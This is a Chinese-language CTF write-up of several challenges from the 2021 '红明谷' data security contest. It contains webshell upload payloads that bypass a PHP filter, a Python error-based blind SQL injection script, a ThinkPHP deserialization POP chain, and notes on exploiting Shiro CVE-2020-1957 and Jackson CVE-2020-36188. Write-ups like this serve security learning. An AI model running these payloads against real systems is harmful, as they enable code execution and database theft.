“红明谷”杯数据安全大赛技能场景赛
“红明谷”杯数据安全大赛技能场景赛
2021-04-03 00:04:00
ctf - wp - 红明谷
签到
略过~
write_shell
代码审计:
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
// if(preg_match("/'| |_|=|php/",$input)){
die('hacker!!!');
}else{
return $input;
}
}
function waf($input){
if(is_array($input)){
foreach($input as $key=>$output){
$input[$key] = waf($output);
}
}else{
$input = check($input);
}
}
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
mkdir($dir);
}
switch($_GET["action"] ?? "") {
case 'pwd':
echo $dir;
break;
case 'upload':
$data = $_GET["data"] ?? "";
waf($data);
file_put_contents("$dir" . "index.php", $data);
}
?>短标签配合反引号执行命令绕过:
/?action=upload&data=<?=`ls%09/`?>发现:
!whatyouwantggggggg401.php bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var\绕一下绕过即可:
?action=upload&data=%3C?=`cat%09/!whatyouwantggggggg401.ph\p`?%3Ehappysql
过滤了单引号、空格、if、or、and其他的常见字符,简单测了一下可以用:
username=admin"union/**/select/**/1,2#&password=123来登陆,||可以使用,fuzz一波发现过滤了不少,找到一个make_set可以替代if,strcmp替代等于号,但常见盲注函数都被ban了,找到locate可以用来取位置。
发现语句错误时就会报错,如当把strcmp写成stcmp时,exp的大于709特性来让语句报错即可,是一种基于错误运行的注入,exp:
import os
import requests
url = "[靶机ip]"
req = requests.session()
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789']
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection':'keep-alive',
}
res = ''
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$^&*(),'
result = ""
for i in range(1,50):
for j in chars:
data = {
#'username':'a"||exp(make_set(strcmp((locate(binary"%s",(select/**/database()),%d)),%d),710,1))#'%(j,i,i),
# 'username':'a"||exp(make_set(strcmp((locate(binary"%s",(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name/**/regexp/**/"ctf"),%d)),%d),710,1))#'%(j,i,i),
'username':'a"||exp(make_set(strcmp((locate(binary"%s",(select/**/group_concat(x.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)x),%d)),%d),710,1))#'%(j,i,i),
'password':'213'
}
# print(data)
rep = req.post(url,data,headers)
text = rep.text
# print(text)
if 'home.php' in text:
result += j
print(result)
break跑出来少了减号,根据其他题的flag在相应位置补上减号即可,注出来flag如下:
easytp
一开始是看了这篇文章:https://mp.weixin.qq.com/s?__biz=MzU2NDc2NDYwMA==&mid=2247484711&idx=1&sn=0dd0f72b376b4922e4ae5b8bd614ae89
跟着调了一下发现链一模一样,直接就打,开了rouge mysql server,读到一些没什么用的文件,没找到flag,受到文末一句话的启示一直在怼堆叠注入写shell发现shell不解析...
然后一直想读配置文件读不到,root/root也不是,这种情况爆破也比较麻烦,随手一试发现root/123456居然。。
然后注了下发现了tp库:
测了一下有个f14g表
没继续注字段了,直接select *读:
<?php
namespace Think\Db\Driver{
use PDO;
class Mysql{
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true // 开启才能读取文件
);
protected $config = array(
"debug" => 1,
"database" => "tp",
"hostname" => "127.0.0.1",
"hostport" => "3306",
"charset" => "utf8",
"username" => "root",
"password" => "123456"
);
}
}
namespace Think\Image\Driver{
use Think\Session\Driver\Memcache;
class Imagick{
private $img;
public function __construct(){
$this->img = new Memcache();
}
}
}
namespace Think\Session\Driver{
use Think\Model;
class Memcache{
protected $handle;
public function __construct(){
$this->handle = new Model();
}
}
}
namespace Think{
use Think\Db\Driver\Mysql;
class Model{
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;
public function __construct(){
$this->db = new Mysql();
$this->options['where'] = '';
$this->pk = 'id';
$this->data[$this->pk] = array(
"table" => "mysql.user where 1=1=extractvalue(1,concat(0x7e,mid((select * from f14g),16)))#",
"where" => "1=1"
);
}
}
}
namespace {
echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}用mid跑两次拿到完整的flag。
javaweb
访问时提示:/json,访问了json又重定向到login,没搞懂,login页面一片空白,尝试post一下发现:
这个rememberMe=deleteMe很明显是shiro,但这里登陆失败的话再结合前面的访问json会重定向,联想到最近的CVE-2020-1957,shiro权限绕过,那么直接绕过:
得到明确的回显了,是jackson,测了下jackson最新的反序列化CVE-2020-36188,发现可行。
那么就直接上工具:https://github.com/welk1n/JNDI-Injection-Exploit
用spring的链打:
拿到flag。
本文原创于HhhM的博客,转载请标明出处。